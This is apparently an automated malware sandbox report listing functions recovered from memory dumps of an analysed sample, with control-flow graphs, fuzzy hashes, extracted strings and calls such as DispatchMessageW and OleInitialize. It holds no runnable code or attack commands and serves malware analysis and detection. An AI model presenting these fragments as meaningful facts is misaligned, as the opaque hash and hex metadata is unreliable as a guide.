                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7180000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8cc6f49dd01926245cb2255fd0596b3e590082b1e3e595964b8a40e0ff166e7c
                                                                                                  • Instruction ID: 44bcd2885236e14a4a92d2ee54f58524ef2b68e43910b80a66f5b2927c59b9a2
                                                                                                  • Opcode Fuzzy Hash: 8cc6f49dd01926245cb2255fd0596b3e590082b1e3e595964b8a40e0ff166e7c
                                                                                                  • Instruction Fuzzy Hash: 4021A9B1D046698BEB68DF2B8C0479AF6F7AFC9310F04C1FAD55CA6254DB740A858F05
                                                                                                  Function 059D75D8 Relevance: .1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2306457415.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_59d0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 12937c3a95ac9e09fe51c47a431a84fa64fb0f3433821f993ac9a46dbc4126bf
                                                                                                  • Instruction ID: 93e89226e0d405ee00b8c694f1f805ce0673dfa2c08a7a0ceeb60b573ee1867c
                                                                                                  • Opcode Fuzzy Hash: 12937c3a95ac9e09fe51c47a431a84fa64fb0f3433821f993ac9a46dbc4126bf
                                                                                                  • Instruction Fuzzy Hash: 6121C2B0D086188BEB18CFABC9447AEFAF7AF89304F14C46AC419A7264EB750585CE51
                                                                                                  Function 02800588 Relevance: 6.3, Strings: 5, Instructions: 86COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2281821459.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2800000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: p$p$p$p$p
                                                                                                  • API String ID: 0-945622192
                                                                                                  • Opcode ID: c660398e451dc40c77430e9840aa07daec50dc43c78855225d6d539f40ccd547
                                                                                                  • Instruction ID: 175705cea572b89ca743138706f2934056f2f145fca7d616b6d7eb7f2b3ff4a2
                                                                                                  • Opcode Fuzzy Hash: c660398e451dc40c77430e9840aa07daec50dc43c78855225d6d539f40ccd547
                                                                                                  • Instruction Fuzzy Hash: 1B314DBA80E3D15FD347873498AA6863F309F17298B0A01D7C885DF1F3E519580AC7A2
                                                                                                  Function 0719A2A8 Relevance: 6.3, Strings: 5, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2316352420.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7180000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (ocq$(ocq$(ocq$-$\scq
                                                                                                  • API String ID: 0-4261760854
                                                                                                  • Opcode ID: 8bafa4191ec6992bb02057029ad09654991c05ae75445051808f52b1373bfcad
                                                                                                  • Instruction ID: c597ccd3acd9dba3ecaf73fe82b8fb1d4fcac905a80282af7458195e6cdade93
                                                                                                  • Opcode Fuzzy Hash: 8bafa4191ec6992bb02057029ad09654991c05ae75445051808f52b1373bfcad
                                                                                                  • Instruction Fuzzy Hash: A031EAB4D04269CFDB24CF59C8447DAB7B6BF89300F5181AAD419A7284DB705E89CF51
                                                                                                  Function 0280AFAE Relevance: 5.1, Strings: 4, Instructions: 95COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2281821459.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2800000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: &$'$+$,
                                                                                                  • API String ID: 0-111508417
                                                                                                  • Opcode ID: d4fa98f3ca84783561c9a15ffdebc2c4533994704a1517809f7b6695d7e779e0
                                                                                                  • Instruction ID: 51e6084339356c4208f9c93b76c5932c52fd5026e38d43bfb181154160c52522
                                                                                                  • Opcode Fuzzy Hash: d4fa98f3ca84783561c9a15ffdebc2c4533994704a1517809f7b6695d7e779e0
                                                                                                  • Instruction Fuzzy Hash: 50514C789012298FDB64DF25D888BEDBBB5BB49305F0091E9D909B3280DB745E89DF50
                                                                                                  Function 0280B2D0 Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2281821459.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2800000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $&$,$-
                                                                                                  • API String ID: 0-710754648
                                                                                                  • Opcode ID: 43e1141b863775250f64556185aa91149d66b7d2e483850f1e4645aea7aa5280
                                                                                                  • Instruction ID: 928e73eeb59b6d7933b11c4cb3c3ea695b3d92571ae14c3ab6f939445e46eb2d
                                                                                                  • Opcode Fuzzy Hash: 43e1141b863775250f64556185aa91149d66b7d2e483850f1e4645aea7aa5280
                                                                                                  • Instruction Fuzzy Hash: 0C414F78901229CFDB64DF25D888BDDBBB5BB0A305F0090DAD909B2280DB705B89DF51
                                                                                                  Function 0280B26E Relevance: 5.1, Strings: 4, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2281821459.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2800000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $&$,$-
                                                                                                  • API String ID: 0-710754648
                                                                                                  • Opcode ID: 4fa544002f64e7941634082033e5443859cdf53c0888a1fff29966c8dcac060f
                                                                                                  • Instruction ID: 5c9ecc68252664d6d4e2093e1901650a2d47d4e951d86ee2b8a1dd527a6069eb
                                                                                                  • Opcode Fuzzy Hash: 4fa544002f64e7941634082033e5443859cdf53c0888a1fff29966c8dcac060f
                                                                                                  • Instruction Fuzzy Hash: EF414F78901229CFDB64DF25D888BDDBBB5BB0A305F0090DAD909B2280DB705B89DF51

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:3.7%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:17
                                                                                                  Total number of Limit Nodes:3
                                                                                                  execution_graph 16774 67b3248 16776 67b32ad 16774->16776 16777 67b32fa 16776->16777 16778 67b223c 16776->16778 16779 67b4350 DispatchMessageW 16778->16779 16780 67b43bc 16779->16780 16780->16776 16761 67b2cb0 16762 67b2fb8 16761->16762 16763 67b2cd8 16761->16763 16764 67b2ce1 16763->16764 16767 67b2174 16763->16767 16766 67b2d04 16769 67b217f 16767->16769 16768 67b2ffb 16768->16766 16769->16768 16771 67b2190 16769->16771 16772 67b3030 OleInitialize 16771->16772 16773 67b3094 16772->16773 16773->16768

                                                                                                  Executed Functions

                                                                                                  Function 022B4338 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 80 22b4338-22b4360 81 22b4362 80->81 82 22b4367-22b43a9 80->82 81->82 83 22b43af-22b442a call 22b7c52 82->83 84 22b4430-22b4437 82->84 83->84 85 22b443d-22b44c2 84->85 86 22b45e0-22b462b 84->86 113 22b45da 85->113 114 22b44c8-22b4544 85->114 96 22b462d-22b4646 86->96 97 22b4680-22b4747 call 22b4058 86->97 96->97 104 22b4648-22b467b 96->104 111 22b4766-22b476c 97->111 104->111 115 22b476e 111->115 116 22b4776 111->116 113->86 128 22b45a3-22b45ac 114->128 115->116 119 22b4777 116->119 119->119 129 22b45ae-22b45b2 128->129 130 22b4546-22b454f 128->130 129->113 132 22b45b4-22b45cf 129->132 133 22b4551 130->133 134 22b4556-22b458e 130->134 132->113 133->134 140 22b45a0 134->140 141 22b4590-22b459e 134->141 140->128 141->129
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4557977703.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_22b0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$Djq
                                                                                                  • API String ID: 0-2038950263
                                                                                                  • Opcode ID: a1c01ac8422d7acde7417c5ae9da7b100024cd184b465f21e1395b89fe912e50
                                                                                                  • Instruction ID: 54b2e9acbafc8a7a333e9cf788269015f0eb09bfd2988d7735437c2208b18333
                                                                                                  • Opcode Fuzzy Hash: a1c01ac8422d7acde7417c5ae9da7b100024cd184b465f21e1395b89fe912e50
                                                                                                  • Instruction Fuzzy Hash: 88D1D174E00219CFDB55DFA9D994A9DBBF2BF89300F1081A9D409AB369DB31AD85CF40
                                                                                                  Function 022B38AE Relevance: .1, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4557977703.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_22b0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c0956d4bd0e0a1037bd5cc319b2f2026ffa63128628b81027418106ff5d83ec6
                                                                                                  • Instruction ID: 85593a6bccdf096bf86c0178a05be38d9074f4bac2674e235b8845cf785ed48b
                                                                                                  • Opcode Fuzzy Hash: c0956d4bd0e0a1037bd5cc319b2f2026ffa63128628b81027418106ff5d83ec6
                                                                                                  • Instruction Fuzzy Hash: 28518378E002188FCB54DF64D958B99BBF1FF89201F1485AAD80AEB355DB349E85CF40
                                                                                                  Function 022BB7A0 Relevance: 5.4, Strings: 4, Instructions: 381COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 22bb7a0-22bb7d4 2 22bb7ef 0->2 3 22bb7d6-22bb7dd 0->3 7 22bb7f7 2->7 4 22bb7df-22bb7e4 3->4 5 22bb7e6-22bb7ed 3->5 6 22bb7fa-22bb80e 4->6 5->6 9 22bb810-22bb817 6->9 10 22bb824-22bb82c 6->10 7->6 11 22bb819-22bb81b 9->11 12 22bb81d-22bb822 9->12 13 22bb82e-22bb832 10->13 11->13 12->13 15 22bb892-22bb895 13->15 16 22bb834-22bb849 13->16 17 22bb8dd-22bb8e3 15->17 18 22bb897-22bb8ac 15->18 16->15 23 22bb84b-22bb84e 16->23 20 22bb8e9-22bb8eb 17->20 21 22bc3de 17->21 18->17 25 22bb8ae-22bb8b2 18->25 20->21 24 22bb8f1-22bb8f6 20->24 28 22bc3e3-22bc4b2 21->28 26 22bb86d-22bb88b call 22b0380 23->26 27 22bb850-22bb852 23->27 29 22bc38c-22bc390 24->29 30 22bb8fc 24->30 31 22bb8ba-22bb8d8 call 22b0380 25->31 32 22bb8b4-22bb8b8 25->32 26->15 27->26 33 22bb854-22bb857 27->33 48 22bc4b4-22bc4cc 28->48 35 22bc392-22bc395 29->35 36 22bc397-22bc3dd 29->36 30->30 31->17 32->17 32->31 33->15 38 22bb859-22bb86b 33->38 35->28 35->36 38->15 38->26 49 22bc4cd-22bc4d8 48->49 50 22bc4d9-22bc4f8 49->50 50->48 52 22bc4fa-22bc510 50->52 52->49 54 22bc512-22bc51c 52->54 54->50 55 22bc51e-22bc556 54->55 56 22bc557-22bc598 55->56 56->56 57 22bc59a-22bc679 56->57
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4557977703.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_22b0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xgq$Xgq$Xgq$Xgq
                                                                                                  • API String ID: 0-1951159037
                                                                                                  • Opcode ID: b8f9ce3a4f3ed56600b7fda7dcdd105257b3bfe879515433ffd4b8093c585b0e
                                                                                                  • Instruction ID: bf988c0e8e1d2af0fe8dffe3c49281630d58920f557e6e60a14bdb22680cd613
                                                                                                  • Opcode Fuzzy Hash: b8f9ce3a4f3ed56600b7fda7dcdd105257b3bfe879515433ffd4b8093c585b0e
                                                                                                  • Instruction Fuzzy Hash: 6EE10A35A015178FC762FFBCC698A96BFF1FF6A351B084696C6148B35AC770A580CB81
                                                                                                  Function 067B223C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 65 67b223c-67b43ba DispatchMessageW 67 67b43bc-67b43c2 65->67 68 67b43c3-67b43d7 65->68 67->68
                                                                                                  APIs
                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,067B356F), ref: 067B43AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4589595101.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_67b0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DispatchMessage
                                                                                                  • String ID: G6K
                                                                                                  • API String ID: 2061451462-3919507867
                                                                                                  • Opcode ID: 8089c40a943f080a95937cdd9f63bbb7891aab9f3cdb9120d1569574a0fffbea
                                                                                                  • Instruction ID: f1192e41ef0e72ec63a2b5727235b0fd00edcc9909f13aaf2b6646bb266d01d1
                                                                                                  • Opcode Fuzzy Hash: 8089c40a943f080a95937cdd9f63bbb7891aab9f3cdb9120d1569574a0fffbea
                                                                                                  • Instruction Fuzzy Hash: 2B11FEB5C046498FCB20DFAAE448BDEFBF4EB48320F14842AE559B3205D379A544CFA5
                                                                                                  Function 067B4348 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46windowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 70 67b4348-67b434b 71 67b4350-67b43ba DispatchMessageW 70->71 72 67b43bc-67b43c2 71->72 73 67b43c3-67b43d7 71->73 72->73
                                                                                                  APIs
                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,067B356F), ref: 067B43AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4589595101.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_67b0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DispatchMessage
                                                                                                  • String ID: G6K
                                                                                                  • API String ID: 2061451462-3919507867
                                                                                                  • Opcode ID: b895d52849b118a39e3e353accd034e0d648af2fdb4c3e75533f91409114141b
                                                                                                  • Instruction ID: a7a6f77dc1db286ea14817b1a24a0068fa86752adbba455983f38c3c9372a989
                                                                                                  • Opcode Fuzzy Hash: b895d52849b118a39e3e353accd034e0d648af2fdb4c3e75533f91409114141b
                                                                                                  • Instruction Fuzzy Hash: 671103B5C042498FCB20DF9AD444BDEFBF4EB48310F14842AD458B3214C378A545CFA5
                                                                                                  Function 067B2190 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 59 67b2190-67b3092 OleInitialize 61 67b309b-67b30b8 59->61 62 67b3094-67b309a 59->62 62->61
                                                                                                  APIs
                                                                                                  • OleInitialize.OLE32(00000000), ref: 067B3085
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4589595101.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_67b0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize
                                                                                                  • String ID: G6K
                                                                                                  • API String ID: 2538663250-3919507867
                                                                                                  • Opcode ID: 110cc8d5fcbc15ee61523ac318fbc7b7b19a1ff96df9901ed99404078f8f8e64
                                                                                                  • Instruction ID: 2b50f3d145e09824bb93814e86ac4b9193fe32384b088afe08666cd7ca54f189
                                                                                                  • Opcode Fuzzy Hash: 110cc8d5fcbc15ee61523ac318fbc7b7b19a1ff96df9901ed99404078f8f8e64
                                                                                                  • Instruction Fuzzy Hash: 991112B5C103498FCB60DF9AD449BDEBBF8EF48324F208459E559A7600C379A984CFA5
                                                                                                  Function 067B3029 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42comCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 75 67b3029-67b3092 OleInitialize 76 67b309b-67b30b8 75->76 77 67b3094-67b309a 75->77 77->76
                                                                                                  APIs
                                                                                                  • OleInitialize.OLE32(00000000), ref: 067B3085
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4589595101.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_67b0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize
                                                                                                  • String ID: G6K
                                                                                                  • API String ID: 2538663250-3919507867
                                                                                                  • Opcode ID: 8b901336f6dbf4aaed7ba6825a96282879e710307de49c1b69fb2884bfac7b5b
                                                                                                  • Instruction ID: 9c645ca3fa687832b440cae086918feefc3a9425be0d5711eee11a3c39338846
                                                                                                  • Opcode Fuzzy Hash: 8b901336f6dbf4aaed7ba6825a96282879e710307de49c1b69fb2884bfac7b5b
                                                                                                  • Instruction Fuzzy Hash: 2D1112B6C00349CFCB20DF99D549BDEBBF4AF48324F25841AD518A7640D339A584CFA1
                                                                                                  Function 05E9A008 Relevance: 2.7, Strings: 2, Instructions: 210COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 143 5e9a008-5e9a027 145 5e9a02d-5e9a036 143->145 146 5e9a1e2-5e9a207 143->146 149 5e9a03c-5e9a091 145->149 150 5e9a20e-5e9a2a8 call 5e99d30 145->150 146->150 159 5e9a0bb-5e9a0c4 149->159 160 5e9a093-5e9a0b8 149->160 190 5e9a2ad-5e9a2b2 150->190 161 5e9a0c9-5e9a0d9 159->161 162 5e9a0c6 159->162 160->159 198 5e9a0db call 5e9a1e9 161->198 199 5e9a0db call 5e9a008 161->199 200 5e9a0db call 5e99ffb 161->200 162->161 165 5e9a0e1-5e9a0e3 167 5e9a13d-5e9a18a 165->167 168 5e9a0e5-5e9a0ea 165->168 182 5e9a191-5e9a196 167->182 170 5e9a0ec-5e9a121 168->170 171 5e9a123-5e9a136 168->171 170->182 171->167 184 5e9a198 182->184 185 5e9a1a0-5e9a1a5 182->185 184->185 187 5e9a1af-5e9a1b4 185->187 188 5e9a1a7 185->188 191 5e9a1c9 187->191 192 5e9a1b6-5e9a1c1 187->192 188->187 191->146 192->191 198->165 199->165 200->165
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4588108884.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_5e90000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (&cq$(gq
                                                                                                  • API String ID: 0-4012885273
                                                                                                  • Opcode ID: 668b6c72bffff0f4d75eff0ff3fef6a744bc144e7cfc23ea0e47c12efd7a9d60
                                                                                                  • Instruction ID: 17035f7fca82fcc8df6a4a17c13f3fe096dcac64a5c7def249d0f7c46f1157e3
                                                                                                  • Opcode Fuzzy Hash: 668b6c72bffff0f4d75eff0ff3fef6a744bc144e7cfc23ea0e47c12efd7a9d60
                                                                                                  • Instruction Fuzzy Hash: F7719D71F002199BDF19DFB9D8516AEBBB2BFC8700F548529E406AB380EF349D428795
                                                                                                  Function 05E9972F Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 201 5e9972f-5e99765 203 5e9976f-5e99775 201->203 204 5e99767-5e9976d 201->204 205 5e9977e-5e9977f 203->205 206 5e99777 203->206 204->203 213 5e997e7-5e997e8 205->213 206->205 207 5e997ed-5e99851 206->207 208 5e9990c-5e9992b 206->208 209 5e998af-5e998b3 206->209 210 5e99781-5e997b1 206->210 211 5e998c2-5e998c9 206->211 212 5e99964-5e9998c 206->212 206->213 214 5e997bb-5e997bf 206->214 215 5e99a1a 206->215 216 5e9993e 206->216 217 5e999d2-5e99a0a 206->217 218 5e99a17-5e99a18 206->218 219 5e99856-5e9989c 206->219 207->203 208->203 220 5e99931-5e99939 208->220 209->219 225 5e998b5-5e998bd 209->225 210->203 238 5e997b3-5e997b9 210->238 227 5e998cb-5e998d7 211->227 228 5e998f3 211->228 212->217 242 5e9998e-5e999ae 212->242 223 5e99941 213->223 221 5e9993f-5e99940 214->221 222 5e997c5-5e997db 214->222 226 5e99a1b 215->226 216->221 245 5e999bd-5e999c6 217->245 247 5e99a0c-5e99a15 217->247 218->226 219->203 248 5e998a2-5e998aa 219->248 220->203 221->223 222->203 231 5e997dd-5e997e5 222->231 239 5e9994d-5e9995f 223->239 225->203 235 5e998d9-5e998df 227->235 236 5e998e1-5e998e7 227->236 229 5e998f9-5e99907 228->229 229->203 231->203 237 5e998f1 235->237 236->237 237->229 238->203 239->203 242->245 246 5e999b0-5e999bb 242->246 250 5e999c8 245->250 251 5e999cf-5e999d0 245->251 246->245 247->245 248->203 250->215 250->217 250->218 250->251 251->215
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4588108884.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_5e90000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHcq$PHcq
                                                                                                  • API String ID: 0-4229179212
                                                                                                  • Opcode ID: 12edffc6b208f9add49ed79d3fbb4b34a9e90bc87901a1345a2c98bbd6efc473
                                                                                                  • Instruction ID: ed4547272226300f08518bdf487f98765c3a469377e7dc565de3cef31d158590
                                                                                                  • Opcode Fuzzy Hash: 12edffc6b208f9add49ed79d3fbb4b34a9e90bc87901a1345a2c98bbd6efc473
                                                                                                  • Instruction Fuzzy Hash: 8F81E574D05219CFEF28DF69C984BADBBF2BB45304F2094AAD049EB252EB745984CF01
                                                                                                  Function 022BC9E0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 253 22bc9e0-22bc9f9 255 22bc9fb-22bc9fd 253->255 256 22bca0a-22bca12 253->256 257 22bc9ff-22bca01 255->257 258 22bca03-22bca08 255->258 259 22bca14-22bca22 256->259 257->259 258->259 262 22bca38-22bca40 259->262 263 22bca24-22bca26 259->263 266 22bca43-22bca46 262->266 264 22bca28-22bca2d 263->264 265 22bca2f-22bca36 263->265 264->266 265->266 268 22bca48-22bca56 266->268 269 22bca5d-22bca61 266->269 268->269 275 22bca58 268->275 270 22bca7a-22bca7d 269->270 271 22bca63-22bca71 269->271 273 22bca7f-22bca83 270->273 274 22bca85-22bcaba 270->274 271->270 280 22bca73 271->280 273->274 277 22bcabc-22bcad3 273->277 282 22bcb1c-22bcb21 274->282 275->269 278 22bcad9-22bcae5 277->278 279 22bcad5-22bcad7 277->279 283 22bcaef-22bcaf9 278->283 284 22bcae7-22bcaed 278->284 279->282 280->270 285 22bcb01 283->285 286 22bcafb 283->286 284->285 289 22bcb09-22bcb15 285->289 286->285 289->282
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4557977703.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_22b0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xgq$Xgq
                                                                                                  • API String ID: 0-2113765878
                                                                                                  • Opcode ID: ecffcac909ae39801891fc00bed2b10bbb284f80e320da4914fa8b613664a769
                                                                                                  • Instruction ID: 874608216ec9d8a0485f44ce84e2b679c593d6072ad8e13b60b7ae38f7c0a989
                                                                                                  • Opcode Fuzzy Hash: ecffcac909ae39801891fc00bed2b10bbb284f80e320da4914fa8b613664a769
                                                                                                  • Instruction Fuzzy Hash: 6731E671B242268FDF199EF989942BF6596BFC53D0F14403BD806D7388DFB88C448691
                                                                                                  Function 022B7C52 Relevance: 2.5, Strings: 2, Instructions: 13COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 292 22b7c52-22b7c80 295 22b7c8c-22b7c8d 292->295
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.4557977703.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_22b0000_file.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: \fz$i
                                                                                                  • API String ID: 0-3110906068
                                                                                                  • Opcode ID: 7a4627885b5c7dc1574105f26ecb2ef408bf49b0c61c01e26e2491efd5f4fd4e
                                                                                                  • Instruction ID: f3d660ffb73554bef8cda4bd71d596ce545f15d8968c5188c0a15656a4cb1ed7
                                                                                                  • Opcode Fuzzy Hash: 7a4627885b5c7dc1574105f26ecb2ef408bf49b0c61c01e26e2491efd5f4fd4e
                                                                                                  • Instruction Fuzzy Hash: CFE0B6B09202689FCF649F50DC94A9DB773FB85301F0041E8A60D63251CB361E81CF18
                                                                                                  Function 05E94476 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
